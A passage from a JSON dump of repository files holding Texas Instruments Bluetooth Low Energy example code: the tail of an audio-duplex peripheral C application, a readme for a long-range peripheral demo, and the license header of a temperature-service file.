&desiredConnTimeout);\n }\n\n // Set the GAP Characteristics\n GGS_SetParameter(GGS_DEVICE_NAME_ATT, GAP_DEVICE_NAME_LEN, attDeviceName);\n\n // Set advertising interval\n {\n uint16_t advInt = DEFAULT_ADVERTISING_INTERVAL;\n\n GAP_SetParamValue(TGAP_LIM_DISC_ADV_INT_MIN, advInt);\n GAP_SetParamValue(TGAP_LIM_DISC_ADV_INT_MAX, advInt);\n GAP_SetParamValue(TGAP_GEN_DISC_ADV_INT_MIN, advInt);\n GAP_SetParamValue(TGAP_GEN_DISC_ADV_INT_MAX, advInt);\n }\n\n // Setup the GAP Bond Manager. For more information see the section in the\n // User's Guide:\n // http://software-dl.ti.com/lprf/sdg-latest/html/\n {\n // Don't send a pairing request after connecting; the peer device must\n // initiate pairing\n uint8_t pairMode = GAPBOND_PAIRING_MODE_WAIT_FOR_REQ;\n // Use authenticated pairing: require passcode.\n uint8_t mitm = TRUE;\n // This device only has display capabilities. Therefore, it will display the\n // passcode during pairing. However, since the default passcode is being\n // used, there is no need to display anything.\n uint8_t ioCap = GAPBOND_IO_CAP_DISPLAY_ONLY;\n // Request bonding (storing long-term keys for re-encryption upon subsequent\n // connections without repairing)\n uint8_t bonding = TRUE;\n\n GAPBondMgr_SetParameter(GAPBOND_PAIRING_MODE, sizeof(uint8_t), &pairMode);\n GAPBondMgr_SetParameter(GAPBOND_MITM_PROTECTION, sizeof(uint8_t), &mitm);\n GAPBondMgr_SetParameter(GAPBOND_IO_CAPABILITIES, sizeof(uint8_t), &ioCap);\n GAPBondMgr_SetParameter(GAPBOND_BONDING_ENABLED, sizeof(uint8_t), &bonding);\n }\n\n // Initialize GATT Client\n VOID GATT_InitClient();\n\n // Register to receive incoming ATT Indications/Notifications\n GATT_RegisterForInd(selfEntity);\n // Initialize GATT attributes\n GGS_AddService(GATT_ALL_SERVICES); // GAP\n GATTServApp_AddService(GATT_ALL_SERVICES); // GATT attributes\n\n // Start the Device\n VOID GAPRole_StartDevice(&SimpleBLEPeripheral_gapRoleCBs);\n\n // Start Bond Manager\n VOID GAPBondMgr_Register(&simpleBLEPeripheral_BondMgrCBs);\n\n // Register with GAP for HCI/Host messages\n GAP_RegisterForMsgs(selfEntity);\n\n // Register for GATT local events and ATT Responses pending for transmission\n GATT_RegisterForMsgs(selfEntity);\n\n HCI_LE_ReadMaxDataLenCmd();\n\n Display_print0(dispHandle, 0, 0, \"Audio Peripheral with DLE\");\n\n // Open pin structure for use\n hSbpPins = PIN_open(&sbpPins, SBP_configTable);\n\n AudioDuplex_open(dispHandle, hSbpPins,\n (pfnAudioDuplexCB_t)SimpleBLEPeripheral_setEvent);\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_taskFxn\n *\n * @brief Application task entry point for the Simple BLE Peripheral.\n *\n * @param a0, a1 - not used.\n *\n * @return None.\n */\nstatic void SimpleBLEPeripheral_taskFxn(UArg a0, UArg a1)\n{\n // Initialize application\n SimpleBLEPeripheral_init();\n\n // Application main loop\n for (;;)\n {\n uint32_t events;\n\n // Waits for an event to be posted associated with the calling thread.\n // Note that an event associated with a thread is posted when a\n // message is queued to the message receive queue of the thread\n\n events = Event_pend(syncEvent, Event_Id_NONE, SBP_ALL_EVENTS,\n ICALL_TIMEOUT_FOREVER);\n\n if (events)\n {\n ICall_EntityID dest;\n ICall_ServiceEnum src;\n ICall_HciExtEvt *pMsg = NULL;\n\n // Fetch any available messages that might have been sent from the stack\n if (ICall_fetchServiceMsg(&src, &dest,\n (void **)&pMsg) == ICALL_ERRNO_SUCCESS)\n {\n uint8 safeToDealloc = TRUE;\n\n if ((src == ICALL_SERVICE_CLASS_BLE) && (dest == selfEntity))\n {\n ICall_Stack_Event *pEvt = (ICall_Stack_Event *)pMsg;\n\n // Check for BLE stack events first\n if (pEvt->signature == 0xffff)\n {\n if (pEvt->event_flag & SBP_CONN_EVT_END_EVT)\n {\n // Try to retransmit pending ATT Response (if any)\n SimpleBLEPeripheral_sendAttRsp();\n }\n }\n else\n {\n // Process inter-task message\n safeToDealloc = SimpleBLEPeripheral_processStackMsg((ICall_Hdr *)pMsg);\n }\n }\n\n if (pMsg && safeToDealloc)\n {\n ICall_freeMsg(pMsg);\n }\n }\n // If RTOS queue is not empty, process app message.\n if (events & SBP_QUEUE_EVT)\n {\n while (!Queue_empty(appMsgQueue))\n {\n sbpEvt_t *pMsg = (sbpEvt_t *)Util_dequeueMsg(appMsgQueue);\n if (pMsg)\n {\n // Process message.\n SimpleBLEPeripheral_processAppMsg(pMsg);\n\n // Free the space from the message.\n ICall_free(pMsg);\n }\n }\n }\n }\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_processStackMsg\n *\n * @brief Process an incoming stack message.\n *\n * @param pMsg - message to process\n *\n * @return TRUE if safe to deallocate incoming message, FALSE otherwise.\n */\nstatic uint8_t SimpleBLEPeripheral_processStackMsg(ICall_Hdr *pMsg)\n{\n uint8_t safeToDealloc = TRUE;\n\n switch (pMsg->event)\n {\n case GATT_MSG_EVENT:\n // Process GATT message\n safeToDealloc = SimpleBLEPeripheral_processGATTMsg((gattMsgEvent_t *)pMsg);\n break;\n\n case HCI_GAP_EVENT_EVENT:\n {\n // Process HCI message\n switch(pMsg->status)\n {\n case HCI_COMMAND_COMPLETE_EVENT_CODE:\n // Process HCI Command Complete Event\n break;\n\n default:\n break;\n }\n }\n break;\n\n default:\n // do nothing\n break;\n }\n\n return (safeToDealloc);\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_processGATTMsg\n *\n * @brief Process GATT messages and events.\n *\n * @return TRUE if safe to deallocate incoming message, FALSE otherwise.\n */\nstatic uint8_t SimpleBLEPeripheral_processGATTMsg(gattMsgEvent_t *pMsg)\n{\n if (state == BLE_STATE_CONNECTED)\n {\n // See if GATT server was unable to transmit an ATT response\n if (pMsg->hdr.status == blePending)\n {\n // No HCI buffer was available. App can try to retransmit the response\n // on the next connection event. Drop it for now.\n Display_print1(dispHandle, 4, 0, \"ATT Rsp dropped %d\", pMsg->method);\n };\n\n switch ( pMsg->method )\n {\n case ATT_HANDLE_VALUE_NOTI:\n // Check to see if notification is from audio data or control char\n if (pMsg->msg.handleValueNoti.handle == audioDataCharValueHandle)\n {\n AudioDuplex_audioData pData;\n pData.len = pMsg->msg.handleValueNoti.len;\n pData.pValue = pMsg->msg.handleValueNoti.pValue;\n AudioDuplex_processData(AudioDuplex_data, &pData);\n }\n else if (pMsg->msg.handleValueNoti.handle == audioStartCharValueHandle)\n {\n AudioDuplex_audioData pData;\n pData.len = pMsg->msg.handleValueNoti.len;\n pData.pValue = pMsg->msg.handleValueNoti.pValue;\n AudioDuplex_processData(AudioDuplex_start_stop, &pData);\n }\n break;\n\n case ATT_FIND_BY_TYPE_VALUE_RSP:\n // Response from GATT_DiscPrimaryServiceByUUID\n // Service found, store handles\n if ( pMsg->msg.findByTypeValueRsp.numInfo > 0 )\n {\n svcStartHdl =\n ATT_ATTR_HANDLE(pMsg->msg.findByTypeValueRsp.pHandlesInfo, 0);\n svcEndHdl =\n ATT_GRP_END_HANDLE(pMsg->msg.findByTypeValueRsp.pHandlesInfo, 0);\n }\n // If procedure complete\n else if ( pMsg->hdr.status == bleProcedureComplete )\n {\n if ( svcStartHdl != 0 )\n {\n if ( serviceToDiscover == AUDIO_SERV_UUID)\n {\n // Discover all characteristics\n GATT_DiscAllChars( connHandle, svcStartHdl, svcEndHdl, selfEntity );\n }\n\n }\n }\n break;\n\n case ATT_ERROR_RSP:\n\n if (serviceToDiscover == AUDIO_SERV_UUID\n && pMsg->msg.errorRsp.reqOpcode == ATT_FIND_BY_TYPE_VALUE_REQ\n && pMsg->msg.errorRsp.handle == 0x0001)\n //0x0001 is the start attribute handle of 0xfff0, AUDIO_SERV_UUID\n {\n if ( (enableCCCDs == TRUE) && (audioStartCharValueHandle != GATT_INVALID_HANDLE))\n {\n audioStartCCCHandle = audioStartCharValueHandle + 1;\n // Begin configuring the characteristics for notifications\n SimpleBLEPeripheral_EnableNotification( connHandle, audioStartCCCHandle );\n }\n }\n break;\n\n case ATT_READ_BY_TYPE_RSP:\n // Response from Discover all Characteristics.\n // Success indicates packet with characteristic discoveries.\n if ( pMsg->hdr.status == SUCCESS )\n {\n attReadByTypeRsp_t *pRsp = &pMsg->msg.readByTypeRsp;\n\n if( serviceToDiscover == AUDIO_SERV_UUID )\n {\n uint16 charUUID = GATT_INVALID_HANDLE;\n uint16 *pHandle = &charUUID;\n /* Write into charUUID what Audio Profile char value we're dealing with */\n *pHandle = BUILD_UINT16( pRsp->pDataList[17] , pRsp->pDataList[18]);\n if (charUUID == AUDIOPROFILE_START_UUID) {\n pHandle = &audioStartCharValueHandle;\n *pHandle = BUILD_UINT16( pRsp->pDataList[3] , pRsp->pDataList[4]);\n }\n else if (charUUID == AUDIOPROFILE_AUDIO_UUID ){\n pHandle = &audioDataCharValueHandle;\n *pHandle = BUILD_UINT16( pRsp->pDataList[3] , pRsp->pDataList[4]);\n }\n }\n break;\n }\n\n // This indicates that there is no more characteristic data\n // to be discovered within the given handle range.\n else if ( pMsg->hdr.status == bleProcedureComplete )\n {\n if ( serviceToDiscover == AUDIO_SERV_UUID )\n {\n /* This kicks off the enabling the 1st of notification enable event */\n if (audioStartCharValueHandle != GATT_INVALID_HANDLE) {\n audioStartCCCHandle = audioStartCharValueHandle + 1 ;\n SimpleBLEPeripheral_EnableNotification( connHandle, audioStartCCCHandle );\n }\n break;\n }\n\n }\n break;\n\n case ATT_WRITE_RSP:\n if ( pMsg->hdr.status == SUCCESS && !serviceDiscComplete )\n {\n uint16 handle = GATT_INVALID_HANDLE;\n\n // Chain the CCCD enable writes so that a RSP for one triggers the next enable.\n if (audioDataCCCHandle == GATT_INVALID_HANDLE) {\n handle = audioDataCCCHandle = audioDataCharValueHandle + 1;\n }\n else {\n serviceDiscComplete = TRUE;\n break;\n }\n\n SimpleBLEPeripheral_EnableNotification( connHandle, handle );\n\n break;\n\n }\n\n break;\n\n\n\n // Service Change indication\n case ATT_HANDLE_VALUE_IND:\n // Note: this logic assumes that the only indications that will be sent\n // will come from that GATT Service Changed Characteristic\n if ( pMsg->hdr.status == SUCCESS )\n {\n\n // Acknowledge receipt of indication\n ATT_HandleValueCfm( pMsg->connHandle );\n\n }\n break;\n\n default:\n // Unknown event\n break;\n } //switch\n } // else - in case a GATT message came after a connection has dropped, ignore it.\n // Needed only for ATT Protocol messages\n GATT_bm_free(&pMsg->msg, pMsg->method);\n\n // It's safe to free the incoming message\n return (TRUE);\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_sendAttRsp\n *\n * @brief Send a pending ATT response message.\n *\n * @param none\n *\n * @return none\n */\nstatic void SimpleBLEPeripheral_sendAttRsp(void)\n{\n // See if there's a pending ATT Response to be transmitted\n if (pAttRsp != NULL)\n {\n uint8_t status;\n\n // Increment retransmission count\n rspTxRetry++;\n\n // Try to retransmit ATT response till either we're successful or\n // the ATT Client times out (after 30s) and drops the connection.\n status = GATT_SendRsp(pAttRsp->connHandle, pAttRsp->method, &(pAttRsp->msg));\n if ((status != blePending) && (status != MSG_BUFFER_NOT_AVAIL))\n {\n // Disable connection event end notice\n HCI_EXT_ConnEventNoticeCmd(pAttRsp->connHandle, selfEntity, 0);\n\n // We're done with the response message\n SimpleBLEPeripheral_freeAttRsp(status);\n }\n else\n {\n // Continue retrying\n Display_print1(dispHandle, 5, 0, \"Rsp send retry: %d\", rspTxRetry);\n }\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_freeAttRsp\n *\n * @brief Free ATT response message.\n *\n * @param status - response transmit status\n *\n * @return none\n */\nstatic void SimpleBLEPeripheral_freeAttRsp(uint8_t status)\n{\n // See if there's a pending ATT response message\n if (pAttRsp != NULL)\n {\n // See if the response was sent out successfully\n if (status == SUCCESS)\n {\n Display_print1(dispHandle, 5, 0, \"Rsp sent retry: %d\", rspTxRetry);\n }\n else\n {\n // Free response payload\n GATT_bm_free(&pAttRsp->msg, pAttRsp->method);\n\n Display_print1(dispHandle, 5, 0, \"Rsp retry failed: %d\", rspTxRetry);\n }\n\n // Free response message\n ICall_freeMsg(pAttRsp);\n\n // Reset our globals\n pAttRsp = NULL;\n rspTxRetry = 0;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_processAppMsg\n *\n * @brief Process an incoming callback from a profile.\n *\n * @param pMsg - message to process\n *\n * @return None.\n */\nstatic void SimpleBLEPeripheral_processAppMsg(sbpEvt_t *pMsg)\n{\n switch (pMsg->hdr.event)\n {\n case SBP_STATE_CHANGE_EVT:\n {\n SimpleBLEPeripheral_processStateChangeEvt((gaprole_States_t)pMsg->\n hdr.state);\n break;\n }\n\n case SBP_KEY_CHANGE_EVT:\n {\n SimpleBLEPeripheral_handleKeys(0, pMsg->hdr.state);\n break;\n }\n\n // Pairing event\n case SBP_PAIRING_STATE_EVT:\n {\n SimpleBLEPeripheral_processPairState(pMsg->hdr.state, *pMsg->pData);\n\n ICall_free(pMsg->pData);\n break;\n }\n\n // Passcode event\n case SBP_PASSCODE_NEEDED_EVT:\n {\n SimpleBLEPeripheral_processPasscode(*pMsg->pData);\n\n ICall_free(pMsg->pData);\n break;\n }\n case SBP_AUDIO_EVT:\n {\n AudioDuplex_eventHandler(pMsg->hdr.state);\n break;\n }\n\n default:\n // Do nothing.\n break;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_stateChangeCB\n *\n * @brief Callback from GAP Role indicating a role state change.\n *\n * @param newState - new state\n *\n * @return None.\n */\nstatic void SimpleBLEPeripheral_stateChangeCB(gaprole_States_t newState)\n{\n SimpleBLEPeripheral_enqueueMsg(SBP_STATE_CHANGE_EVT, newState, 0);\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_processStateChangeEvt\n *\n * @brief Process a pending GAP Role state change event.\n *\n * @param newState - new state\n *\n * @return None.\n */\nstatic void SimpleBLEPeripheral_processStateChangeEvt(gaprole_States_t newState)\n{\n switch ( newState )\n {\n case GAPROLE_STARTED:\n {\n uint8_t ownAddress[B_ADDR_LEN];\n\n GAPRole_GetParameter(GAPROLE_BD_ADDR, ownAddress);\n\n // Display device address\n Display_print0(dispHandle, 1, 0, Util_convertBdAddr2Str(ownAddress));\n Display_print0(dispHandle, 2, 0, \"Initialized\");\n }\n break;\n\n case GAPROLE_ADVERTISING:\n Display_print0(dispHandle, 2, 0, \"Advertising\");\n break;\n\n case GAPROLE_CONNECTED:\n {\n state = BLE_STATE_CONNECTED;\n\n uint8_t peerAddress[B_ADDR_LEN];\n\n GAPRole_GetParameter(GAPROLE_CONN_BD_ADDR, peerAddress);\n\n GAPRole_GetParameter(GAPROLE_CONNHANDLE, &connHandle);\n\n AudioDuplex_setConnectionHandle(connHandle);\n\n Display_print0(dispHandle, 2, 0, \"Connected\");\n Display_print0(dispHandle, 3, 0, Util_convertBdAddr2Str(peerAddress));\n\n if (FALSE == serviceDiscComplete)\n {\n // Begin Service Discovery of AUDIO Service to find out report handles\n serviceToDiscover = AUDIO_SERV_UUID;\n SimpleBLEPeripheral_DiscoverService( connHandle, serviceToDiscover );\n }\n\n }\n break;\n\n case GAPROLE_CONNECTED_ADV:\n Display_print0(dispHandle, 2, 0, \"Connected Advertising\");\n break;\n\n case GAPROLE_WAITING:\n Util_stopClock(&periodicClock);\n SimpleBLEPeripheral_freeAttRsp(bleNotConnected);\n\n Display_print0(dispHandle, 2, 0, \"Disconnected\");\n\n serviceDiscComplete = FALSE;\n\n audioStartCharValueHandle = GATT_INVALID_HANDLE;\n audioStartCCCHandle = GATT_INVALID_HANDLE;\n audioDataCharValueHandle = GATT_INVALID_HANDLE;\n audioDataCCCHandle = GATT_INVALID_HANDLE;\n\n AudioDuplex_stopStreaming();\n\n // Clear remaining lines\n Display_clearLines(dispHandle, 3, 5);\n break;\n\n case GAPROLE_WAITING_AFTER_TIMEOUT:\n SimpleBLEPeripheral_freeAttRsp(bleNotConnected);\n\n Display_print0(dispHandle, 2, 0, \"Timed Out\");\n\n serviceDiscComplete = FALSE;\n\n audioStartCharValueHandle = GATT_INVALID_HANDLE;\n audioStartCCCHandle = GATT_INVALID_HANDLE;\n audioDataCharValueHandle = GATT_INVALID_HANDLE;\n audioDataCCCHandle = GATT_INVALID_HANDLE;\n\n AudioDuplex_stopStreaming();\n\n // Clear remaining lines\n Display_clearLines(dispHandle, 3, 5);\n break;\n\n case GAPROLE_ERROR:\n Display_print0(dispHandle, 2, 0, \"Error\");\n break;\n\n default:\n Display_clearLine(dispHandle, 2);\n break;\n }\n\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_keyChangeHandler\n *\n * @brief Key event handler function\n *\n * @param a0 - ignored\n *\n * @return none\n */\nvoid SimpleBLEPeripheral_keyChangeHandler(uint8 keys)\n{\n SimpleBLEPeripheral_enqueueMsg(SBP_KEY_CHANGE_EVT, keys, NULL);\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_enqueueMsg\n *\n * @brief Creates a message and puts the message in RTOS queue.\n *\n * @param event - message event.\n * @param state - message state.\n *\n * @return None.\n */\nstatic uint8_t SimpleBLEPeripheral_enqueueMsg(uint8_t event, uint8_t state,\n uint8_t *pData)\n{\n sbpEvt_t *pMsg = ICall_malloc(sizeof(sbpEvt_t));\n\n // Create dynamic pointer to message.\n if (pMsg)\n {\n pMsg->hdr.event = event;\n pMsg->hdr.state = state;\n pMsg->pData = pData;\n\n // Enqueue the message.\n return Util_enqueueMsg(appMsgQueue, syncEvent, (uint8_t *)pMsg);\n }\n\n return FALSE;\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_handleKeys\n *\n * @brief Handles all key events for this device.\n *\n * @param shift - true if in shift/alt.\n * @param keys - bit field for key events. Valid entries:\n * KEY_LEFT\n * KEY_RIGHT\n *\n * @return none\n */\nstatic void SimpleBLEPeripheral_handleKeys(uint8_t shift, uint8_t keys)\n{\n static uint8_t previousKeys = 0;\n uint16_t connectionHandle = AudioDuplex_getConnectionHandle();\n\n // Only process changes in keys pressed\n if (keys != previousKeys)\n {\n if(connectionHandle != INVALID_CONNHANDLE && linkDB_Up(connectionHandle))\n {\n // Check for both keys first\n if (keys == (KEY_LEFT | KEY_RIGHT))\n {\n // Start chain of events to stop stream\n AudioDuplex_stopStreaming();\n }\n else if (keys & KEY_LEFT)\n {\n AudioDuplex_startStreaming(AUDIO_DUPLEX_STREAM_TYPE_MSBC);\n }\n else if (keys & KEY_RIGHT)\n {\n AudioDuplex_startStreaming(AUDIO_DUPLEX_STREAM_TYPE_ADPCM);\n }\n }\n else\n {\n Display_print0(dispHandle, 2, 0, \"Connection required for stream\");\n }\n }\n previousKeys = keys;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_pairStateCB\n *\n * @brief Pairing state callback.\n *\n * @return none\n */\nstatic void SimpleBLEPeripheral_pairStateCB(uint16_t connHandle, uint8_t state,\n uint8_t status)\n{\n uint8_t *pData;\n // Allocate space for the event data.\n if ((pData = ICall_malloc(sizeof(uint8_t))))\n {\n *pData = status;\n // Queue the event.\n SimpleBLEPeripheral_enqueueMsg(SBP_PAIRING_STATE_EVT, state, pData);\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processPairState\n *\n * @brief Process the new paring state.\n *\n * @return none\n */\nstatic void SimpleBLEPeripheral_processPairState(uint8_t state, uint8_t status)\n{\n Display_clearLines(dispHandle, 5, 5);\n switch (state)\n {\n case GAPBOND_PAIRING_STATE_STARTED:\n Display_print0(dispHandle, 2, 0, \"Pairing started\");\n break;\n\n case GAPBOND_PAIRING_STATE_COMPLETE:\n if (status == SUCCESS)\n {\n // Enter a GAP Bond manager Paired state\n Display_print0(dispHandle, 2, 0, \"Pairing success\");\n\n if (FALSE == serviceDiscComplete)\n {\n // Begin Service Discovery of AUDIO Service to find out report handles\n serviceToDiscover = AUDIO_SERV_UUID;\n SimpleBLEPeripheral_DiscoverService( connHandle, serviceToDiscover );\n }\n }\n else\n {\n Display_print1(dispHandle, 2, 0, \"Pairing fail: %d\", status);\n }\n break;\n\n case GAPBOND_PAIRING_STATE_BOND_SAVED:\n if (status == SUCCESS)\n {\n Display_print0(dispHandle, 2, 0, \"Bond Saved\");\n }\n break;\n\n case GAPBOND_PAIRING_STATE_BONDED:\n if (status == SUCCESS)\n {\n\n if (\n ( remoteHandles.audioStartCharValueHandle == GATT_INVALID_HANDLE ) ||\n ( remoteHandles.audioDataCharValueHandle == GATT_INVALID_HANDLE )\n )\n {\n\n serviceDiscComplete = FALSE;\n serviceToDiscover = AUDIO_SERV_UUID;\n\n // We must perform service discovery again, something might have changed.\n // Begin Service Discovery\n SimpleBLEPeripheral_DiscoverService( connHandle, serviceToDiscover );\n\n }\n else\n {\n // No change, restore handle info.\n // bonding indicates that we probably already enabled all these characteristics. easy fix if not.\n serviceDiscComplete = TRUE;\n\n audioStartCharValueHandle = remoteHandles.audioStartCharValueHandle;\n audioDataCharValueHandle = remoteHandles.audioDataCharValueHandle;\n\n }\n\n Display_print0(dispHandle, 2, 0, \"Bond save success\");\n }\n else\n {\n Display_print1(dispHandle, 2, 0, \"Bond save failed: %d\", status);\n }\n break;\n\n default:\n break;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_passcodeCB\n *\n * @brief Passcode callback.\n *\n * @return none\n */\nstatic void SimpleBLEPeripheral_passcodeCB(uint8_t *deviceAddr, uint16_t connHandle,\n uint8_t uiInputs, uint8_t uiOutputs)\n{\n uint8_t *pData;\n\n // Allocate space for the passcode event.\n if ((pData = ICall_malloc(sizeof(uint8_t))))\n {\n *pData = uiOutputs;\n\n // Enqueue the event.\n SimpleBLEPeripheral_enqueueMsg(SBP_PASSCODE_NEEDED_EVT, 0, pData);\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_processPasscode\n *\n * @brief Process the Passcode request.\n *\n * @return none\n */\nstatic void SimpleBLEPeripheral_processPasscode(uint8_t uiOutputs)\n{\n // This app uses a default passcode. A real-life scenario would handle all\n // pairing scenarios and likely generate this randomly.\n uint32_t passcode = B_APP_DEFAULT_PASSCODE;\n\n // Display passcode to user\n if (uiOutputs != 0)\n {\n Display_print1(dispHandle, 4, 0, \"Passcode: %d\", passcode);\n }\n\n uint16_t connectionHandle;\n GAPRole_GetParameter(GAPROLE_CONNHANDLE, &connectionHandle);\n\n // Send passcode response\n GAPBondMgr_PasscodeRsp(connectionHandle, SUCCESS, passcode);\n}\n\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_DiscoverService\n *\n * @brief Discover service using UUID.\n *\n * @param connHandle - connection handle to do discovery on\n * @param svcUuid - service UUID to discover\n *\n * @return none\n */\nstatic void SimpleBLEPeripheral_DiscoverService( uint16 connHandle, uint16 svcUuid )\n{\n if(svcUuid == AUDIO_SERV_UUID) // only take care of Audio Service in this project\n {\n uint8 uuid[16] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB0,\n 0x00, 0x40, 0x51, 0x04, LO_UINT16( svcUuid ), HI_UINT16( svcUuid ), 0x00, 0xF0};\n\n VOID GATT_DiscPrimaryServiceByUUID( connHandle, uuid, ATT_UUID_SIZE, selfEntity );\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_EnableNotification\n *\n * @brief Enable notification for a given attribute handle.\n *\n * @param connHandle - connection handle to send notification on\n * @param attrHandle - attribute handle to send notification for\n *\n * @return none\n */\nstatic void SimpleBLEPeripheral_EnableNotification( uint16 connHandle, uint16 attrHandle )\n{\n attWriteReq_t req;\n\n req.pValue = GATT_bm_alloc( connHandle, ATT_WRITE_REQ, 2, NULL );\n if ( req.pValue != NULL )\n {\n uint8 notificationsOn[] = {0x01, 0x00};\n\n req.handle = attrHandle;\n\n req.len = 2;\n memcpy(req.pValue, notificationsOn, 2);\n\n req.sig = 0;\n req.cmd = 0;\n\n if ( GATT_WriteCharValue( connHandle, &req, selfEntity ) != SUCCESS )\n {\n GATT_bm_free( (gattMsg_t *)&req, ATT_WRITE_REQ );\n }\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_setEvent\n *\n * @brief Function to set event in the Simple BLE Peripheral task.\n *\n * @param None.\n *\n * @return None.\n */\nvoid SimpleBLEPeripheral_setEvent(uint8_t newEvents)\n{\n SimpleBLEPeripheral_enqueueMsg(SBP_AUDIO_EVT, newEvents, NULL);\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_setEvent\n *\n * @brief Function to set event in the Simple BLE Peripheral task.\n *\n * @param None.\n *\n * @return None.\n */\nvoid SimpleBLEPeripheral_clearEvent(uint16_t clearEvents)\n{\n\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_isConnected\n *\n * @brief Function to set event in the Simple BLE Peripheral task.\n *\n * @param None.\n *\n * @return TRUE if connected, FALSE if not.\n */\nuint8_t SimpleBLEPeripheral_isConnected(void)\n{\n uint8_t gapRoleState;\n GAPRole_GetParameter(GAPROLE_STATE, &gapRoleState);\n\n return (gapRoleState == GAPROLE_CONNECTED);\n}\n\n/*********************************************************************\n *********************************************************************/\n"
},
{
"alpha_fraction": 0.7746220827102661,
"alphanum_fraction": 0.7938616871833801,
"avg_line_length": 42.65999984741211,
"blob_id": "ca752d5c2aaef44a2959fa7e7d7de53ab6509495",
"content_id": "01d4e55ded468e496399b33298e73b8e37043c9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2183,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 50,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_peripheral/readme.md",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "# BLE5-Stack Long Range Peripheral\n\n## Functional Overview\n\nThis example page will demonstrate the Bluetooth™ 5 Long Range\ncapabilities of the Texas Instruments CC2640R2 SDK's BLE5-Stack.\n\nThis project is a modified Simple Peripheral sample application from the\nBLE5-Stack component of the SDK.\n\nThis list contains the changes from the standard Simple Peripheral example:\n- Removed the Simple GATT Profile\n- Added Support for a custom profile called Throughput Profile\n- Added Support for a custom profile called Temperature Profile\n - Based on the [Sensor Tag's Temperature profile](http://processors.wiki.ti.com/index.php/CC2650_SensorTag_User's_Guide#IR_Temperature_Sensors)\n\nThe Long Range Peripheral is intended to be a head-less device that can used\nwith a USB-powered battery pack to evaluate range capabilities. All the control\nfunctions are handled by the Long Range Central device. Once connected, the\nCentral instructs the Peripheral to negotiate the use of the Coded PHY at which\nthe device will update the LED status and start gather temperature data.\nSimilarly, when the Central enables notifications on the Temperature Profile's\nData Characteristic, the peripheral will send the temperature data to the\ncentral at a 1s interval. Once the connection is dropped or terminated, the\nperipheral must be moved within the range of a 1M PHY.\n\n## Project Hardware\n- 1 CC2650R2 Launchpad\n\n### LED Output\n\n- RED: Solid RED indicates the device is not connected to a central.\n- GREEN: Blinking GREEN indicates the device is connected to a central in\n using the Long Range Coded PHY (S8).\n\n### Two Button Menu\n\nThe Two Button Menu system is designed to utilize the two push buttons available\non the CC2640R2 Launchpad. The left button (BTN1) is always used to cycle\nbetween options. The right button (BTN2) is used to activate the selected action\nor item.\n\nThe Two Button Menu is set up by default to utilize the back channel UART\npresent on the Launchpad as it's display.\n\n### Running the Demo\n\n1. Compile and load the projects:\n - First build and load `ble5_longrange_peripheral_cc2640r2lp_stack`\n - Next build and load `ble5_longrange_peripheral_cc2640r2lp_app`\n"
},
{
"alpha_fraction": 0.6147661805152893,
"alphanum_fraction": 0.6278917193412781,
"avg_line_length": 31.078947067260742,
"blob_id": "b247eafa97d2cb7ea8dfebc29e875ec5aead86ea",
"content_id": "eefab5299dc1e5d2072066c7282f67d69d198bab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 6095,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 190,
"path": "/source/ti/ble5stack/profiles/temperature/temperature_service.h",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (c) 2017, Texas Instruments Incorporated\n * All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the distribution.\n *\n * * Neither the name of Texas Instruments Incorporated nor the names of\n * its contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n * THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n 